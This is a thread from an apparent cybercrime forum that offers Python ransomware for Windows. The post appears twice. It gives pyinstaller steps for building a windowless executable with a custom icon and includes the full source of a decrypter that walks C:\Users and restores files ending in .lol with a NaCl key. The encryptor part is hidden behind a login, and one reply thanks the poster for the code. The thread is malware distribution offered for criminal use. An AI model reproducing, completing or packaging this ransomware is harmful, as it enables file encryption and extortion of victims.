Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

Python Ransomware Source Code

Gold

Mars

🔥 Businessman 🔥
🔥 Businessman 🔥
USDT(TRC-20)
$0.0

Python Ransomware

1703719718429
Complete Python RansomWare Source Code With Full Documentations
About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Last Update : 12/25/2023
Went Find out about what is Ransomware


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

To Decrypt Files :​


Run DeRansomware.py On line 29 From :
To Your Key (example):​
Key = b"\xbd\xb6\x80'4z\x9c\xb53{\xe3\xd7\xf4\xc2\\x08\xbd\xbb\xdb\xd6\xb2.\xfa\xe1o\x1f\xcd\x80AM\xd5>"
OR :​
Key = b'T\xb5\xc4\x14\xe4\xa7\x18\x0b8T\xdb\xec\xf0.v>t\xce\x91w5y1\xce\xa3\x1a;J<SKD'
Replace Key Betwen " " or ' ' with your own key​

DeRansomware.py - Decrypter:
#!/usr/bin/python3 try : import nacl, nacl.secret, pathlib, os # Our requirement except: print("Error try To run pip install requirement.txt") """Making class in order to decrypt""" class Decrypt(object): def __init__(self, Target,BoxM): self.Target = Target [HASH=171]#Our[/HASH] file Location self.BoxM = BoxM [HASH=172]#Box[/HASH] Moudle def FileE(loc): DeFileN = (loc.Target).strip(".lol") [HASH=173]#Remove[/HASH] .lol EnFileN = (loc.Target) # Our encrypted File name Date = 0 # Making null Date Var with open(EnFileN,"rb") as File: Date = File.read() # Read encrypted File and set all the date to the Date Var Decrypted = loc.BoxM.decrypt(Date) # Decrypte File with open(DeFileN,"wb") as File: File.write(Decrypted) # Save File to is the original state os.remove(EnFileN) # Removing Old file print(f"Decrypted -&gt; {DeFileN}") # You can remove if you went This line is for deBuging """Setting Up Some Global Vars""" Key = b'password' # Add your key hare box = nacl.secret.SecretBox(Key) # Our Safe box Moudle that we use to Decrypte Paths = [r"C:\Users\\"] # List of paths to Look for Files in """Our ForLoop So we walkthrough Our paths """ for AllFiles in Paths: # For all files in our list if (pathlib.Path(AllFiles).exists()): # Check if Path is a file, not a folder for path, subdirs, files in os.walk(AllFiles): if(("\\AppData\\") in path):pass # This is our blocklist you can add more else: for file in files : # For all of files in that folder if(".lol" in file): # Check if File have .lol formate FilePath = os.path.join(path, file) # Join Our path to our file nmae Decrypt(FilePath,box).FileE() # Call our Decrypt Moudle

Ransomware.py - Crypter + Ransomware:
 
Last edited by a moderator:

Python Ransomware

View attachment 141
Complete Python RansomWare Source Code With Full Documentations
About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Last Update : 12/25/2023
Went Find out about what is Ransomware


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

To Decrypt Files :​


Run DeRansomware.py On line 29 From :
To Your Key (example):​
Key = b"\xbd\xb6\x80'4z\x9c\xb53{\xe3\xd7\xf4\xc2\\x08\xbd\xbb\xdb\xd6\xb2.\xfa\xe1o\x1f\xcd\x80AM\xd5>"
OR :​
Key = b'T\xb5\xc4\x14\xe4\xa7\x18\x0b8T\xdb\xec\xf0.v>t\xce\x91w5y1\xce\xa3\x1a;J<SKD'
Replace Key Betwen " " or ' ' with your own key​

DeRansomware.py - Decrypter:
#!/usr/bin/python3 try : import nacl, nacl.secret, pathlib, os # Our requirement except: print("Error try To run pip install requirement.txt") """Making class in order to decrypt""" class Decrypt(object): def __init__(self, Target,BoxM): self.Target = Target [HASH=171]#Our[/HASH] file Location self.BoxM = BoxM [HASH=172]#Box[/HASH] Moudle def FileE(loc): DeFileN = (loc.Target).strip(".lol") [HASH=173]#Remove[/HASH] .lol EnFileN = (loc.Target) # Our encrypted File name Date = 0 # Making null Date Var with open(EnFileN,"rb") as File: Date = File.read() # Read encrypted File and set all the date to the Date Var Decrypted = loc.BoxM.decrypt(Date) # Decrypte File with open(DeFileN,"wb") as File: File.write(Decrypted) # Save File to is the original state os.remove(EnFileN) # Removing Old file print(f"Decrypted -&gt; {DeFileN}") # You can remove if you went This line is for deBuging """Setting Up Some Global Vars""" Key = b'password' # Add your key hare box = nacl.secret.SecretBox(Key) # Our Safe box Moudle that we use to Decrypte Paths = [r"C:\Users\\"] # List of paths to Look for Files in """Our ForLoop So we walkthrough Our paths """ for AllFiles in Paths: # For all files in our list if (pathlib.Path(AllFiles).exists()): # Check if Path is a file, not a folder for path, subdirs, files in os.walk(AllFiles): if(("\\AppData\\") in path):pass # This is our blocklist you can add more else: for file in files : # For all of files in that folder if(".lol" in file): # Check if File have .lol formate FilePath = os.path.join(path, file) # Join Our path to our file nmae Decrypt(FilePath,box).FileE() # Call our Decrypt Moudle

Ransomware.py - Crypter + Ransomware:
*** Hidden text: cannot be quoted. ***
Thank you for this code I needed it
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top